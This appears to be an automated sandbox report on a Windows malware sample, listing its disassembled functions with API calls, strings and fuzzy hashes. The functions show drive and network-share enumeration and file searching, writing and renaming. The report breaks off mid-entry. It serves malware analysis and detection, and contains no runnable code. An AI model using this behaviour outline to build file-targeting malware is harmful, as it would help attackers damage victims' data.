                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$AppendFolder
                                                                                                                                                    • String ID: bowsakkdestx.txt
                                                                                                                                                    • API String ID: 29327785-2616962270
                                                                                                                                                    • Opcode ID: 92c5e79d6d18e0f3d0154127dc690bac5f637d3b8d3d03dbbad9440c2cbb5f71
                                                                                                                                                    • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                                                                                                                                    • Opcode Fuzzy Hash: 92c5e79d6d18e0f3d0154127dc690bac5f637d3b8d3d03dbbad9440c2cbb5f71
                                                                                                                                                    • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                                                                                                                                    • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CreateShowUpdate
                                                                                                                                                    • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                                                    • API String ID: 2944774295-3503800400
                                                                                                                                                    • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                                                                    • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                                                                                                                                                    • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                                                                    • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00410C12
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00410C39
                                                                                                                                                    • _memset.LIBCMT ref: 00410C4C
                                                                                                                                                    • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 364255426-0
                                                                                                                                                    • Opcode ID: 54b312cc4ee8bd09624119d4c268e334e055f93c635bfd49589b22278edf9028
                                                                                                                                                    • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                                                                                    • Opcode Fuzzy Hash: 54b312cc4ee8bd09624119d4c268e334e055f93c635bfd49589b22278edf9028
                                                                                                                                                    • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2560635915-0
                                                                                                                                                    • Opcode ID: f3d66c870aa32460fe4bafe28572feaf0b0c8f95b2e2c29055474f6afb987447
                                                                                                                                                    • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                                                                                                                                    • Opcode Fuzzy Hash: f3d66c870aa32460fe4bafe28572feaf0b0c8f95b2e2c29055474f6afb987447
                                                                                                                                                    • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _malloc.LIBCMT ref: 00423B64
                                                                                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00710000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 00423B82
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00423B97
                                                                                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                                    • String ID: bad allocation
                                                                                                                                                    • API String ID: 3074076210-2104205924
                                                                                                                                                    • Opcode ID: 5a30cb00e75dcdab980d2d32e4f562ff827087a40d750860f30e7c3bc12dc385
                                                                                                                                                    • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                                                                                                                                                    • Opcode Fuzzy Hash: 5a30cb00e75dcdab980d2d32e4f562ff827087a40d750860f30e7c3bc12dc385
                                                                                                                                                    • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 0040F125
                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1421093161-0
                                                                                                                                                    • Opcode ID: e7bfa81e947bc27759b8ab1fc6419497722b83581183109e63c95d0c44b06b23
                                                                                                                                                    • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                                                                                                                                    • Opcode Fuzzy Hash: e7bfa81e947bc27759b8ab1fc6419497722b83581183109e63c95d0c44b06b23
                                                                                                                                                    • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                                                                                                                                                      • Part of subcall function 004111C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0041120F
                                                                                                                                                      • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00411228
                                                                                                                                                      • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041123D
                                                                                                                                                      • Part of subcall function 004111C0: MoveFileW.KERNEL32(00000000,?), ref: 00411277
                                                                                                                                                      • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                                                                      • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                                                                      • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0041B4CD
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0041B4D7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                                                    • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                                                    • API String ID: 441990211-897913220
                                                                                                                                                    • Opcode ID: 45d73429e29eeefaca4f9398968167e5edb4bad7ffa24b22de0f09ece1bcdd92
                                                                                                                                                    • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                                                                                                                                                    • Opcode Fuzzy Hash: 45d73429e29eeefaca4f9398968167e5edb4bad7ffa24b22de0f09ece1bcdd92
                                                                                                                                                    • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                                                                                                                                      • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                                                                    • _memset.LIBCMT ref: 00413C83
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                    • API String ID: 1327501947-3788999226
                                                                                                                                                    • Opcode ID: e5c94bc44cf57a372b92b54ac174d1763daff5f3c1caf4189f35d58b11ed2149
                                                                                                                                                    • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                                                                                                                                    • Opcode Fuzzy Hash: e5c94bc44cf57a372b92b54ac174d1763daff5f3c1caf4189f35d58b11ed2149
                                                                                                                                                    • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040EF50 Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _malloc.LIBCMT ref: 0040EF69
                                                                                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00710000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                                                                                                                                                    • _malloc.LIBCMT ref: 0040EF85
                                                                                                                                                    • _memset.LIBCMT ref: 0040EF9B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _malloc$AllocateHeap_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3655941445-0
                                                                                                                                                    • Opcode ID: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                                                                    • Instruction ID: 5fa84ec4042e21db229fa26042ce02b7cce951e2f5e2b33d0654eda62efe4b83
                                                                                                                                                    • Opcode Fuzzy Hash: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                                                                    • Instruction Fuzzy Hash: 06110631600624EFCB10DF99D881A5ABBB5FF89314F2445A9E9489F396D731B912CBC1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00415F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00415FE2
                                                                                                                                                      • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                    • API String ID: 657562460-3788999226
                                                                                                                                                    • Opcode ID: 58ffd612dd9ddedb772e5da98b2a94be3d7e6db019e752b712b9e909edd715d2
                                                                                                                                                    • Instruction ID: 062493fe71bda258871ba60a2f6f35179966240c7be00a7e807cfa683484c744
                                                                                                                                                    • Opcode Fuzzy Hash: 58ffd612dd9ddedb772e5da98b2a94be3d7e6db019e752b712b9e909edd715d2
                                                                                                                                                    • Instruction Fuzzy Hash: 8011E675600118DF8B04EF1CD981CDABBE9EF84300744816AED098F70AEB35EE65C6A5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00413A90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413B0A
                                                                                                                                                      • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                    • API String ID: 657562460-3788999226
                                                                                                                                                    • Opcode ID: 0ad4a0ca8fdadbc1a12cf66a996cd1011d67085deb4d362cb70db5a7c32d017b
                                                                                                                                                    • Instruction ID: 58ba692ce99c870a1dcba0d104e91e6c126768a8e2c2fae69a1ad948a11fc536
                                                                                                                                                    • Opcode Fuzzy Hash: 0ad4a0ca8fdadbc1a12cf66a996cd1011d67085deb4d362cb70db5a7c32d017b
                                                                                                                                                    • Instruction Fuzzy Hash: F401F171200705ABD720CFACC09068BFBE8AF80725F20853FEA5583381EBB5E944C784
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00454C00 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00454AE0: GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                                                                                      • Part of subcall function 00454AE0: GetFileType.KERNEL32(00000000), ref: 00454B05
                                                                                                                                                      • Part of subcall function 00454AE0: __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                                                                                    • _raise.LIBCMT ref: 00454C18
                                                                                                                                                      • Part of subcall function 0042A12E: __getptd_noexit.LIBCMT ref: 0042A16B
                                                                                                                                                      • Part of subcall function 00427CEC: _doexit.LIBCMT ref: 00427CF6
                                                                                                                                                    Strings
                                                                                                                                                    • %s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 00454C0C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileHandleType__getptd_noexit__vfwprintf_p_doexit_raise
                                                                                                                                                    • String ID: %s(%d): OpenSSL internal error, assertion failed: %s
                                                                                                                                                    • API String ID: 2149077303-4210838268
                                                                                                                                                    • Opcode ID: c8b60d106a6ddf9770fe8ded3b270afc7ab6773223e56d6f9ab2ba1de5c26324
                                                                                                                                                    • Instruction ID: fa72e03f5863b2a05375eef283b674a1c5903e86e1e3734bc2555e426bc738f9
                                                                                                                                                    • Opcode Fuzzy Hash: c8b60d106a6ddf9770fe8ded3b270afc7ab6773223e56d6f9ab2ba1de5c26324
                                                                                                                                                    • Instruction Fuzzy Hash: 6FD09E795892107FED022791EC07A1E7A51AF9471CF808419F69A041A2D6768534AA5B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040FD57 Relevance: 3.1, APIs: 2, Instructions: 134fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2799698630-0
                                                                                                                                                    • Opcode ID: 4bf8c411a87167a108a0481e02709c694e13ad017850b4e6761078ffc35ef305
                                                                                                                                                    • Instruction ID: 5ab157793dcca273c0e587975c0a14bd2b460513ddb2d20d8000ed9fb441c990
                                                                                                                                                    • Opcode Fuzzy Hash: 4bf8c411a87167a108a0481e02709c694e13ad017850b4e6761078ffc35ef305
                                                                                                                                                    • Instruction Fuzzy Hash: 30519D70D00219DAEF20DF60DD457DEBBB5BF15308F4040BAD40A66291EB7A9AC9CF5A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0042FB64 Relevance: 3.0, APIs: 2, Instructions: 17COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __lock.LIBCMT ref: 0042FB7B
                                                                                                                                                      • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                                                                      • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                                                                      • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(00000000,?,004250D7,0000000D), ref: 00428B22
                                                                                                                                                    • __tzset_nolock.LIBCMT ref: 0042FB8E
                                                                                                                                                      • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                                                                                                                                                      • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                                                                                                                                                      • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                                                                                                                                                      • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                                                                                                                                                      • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                                                                                                                                                      • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1282695788-0
                                                                                                                                                    • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
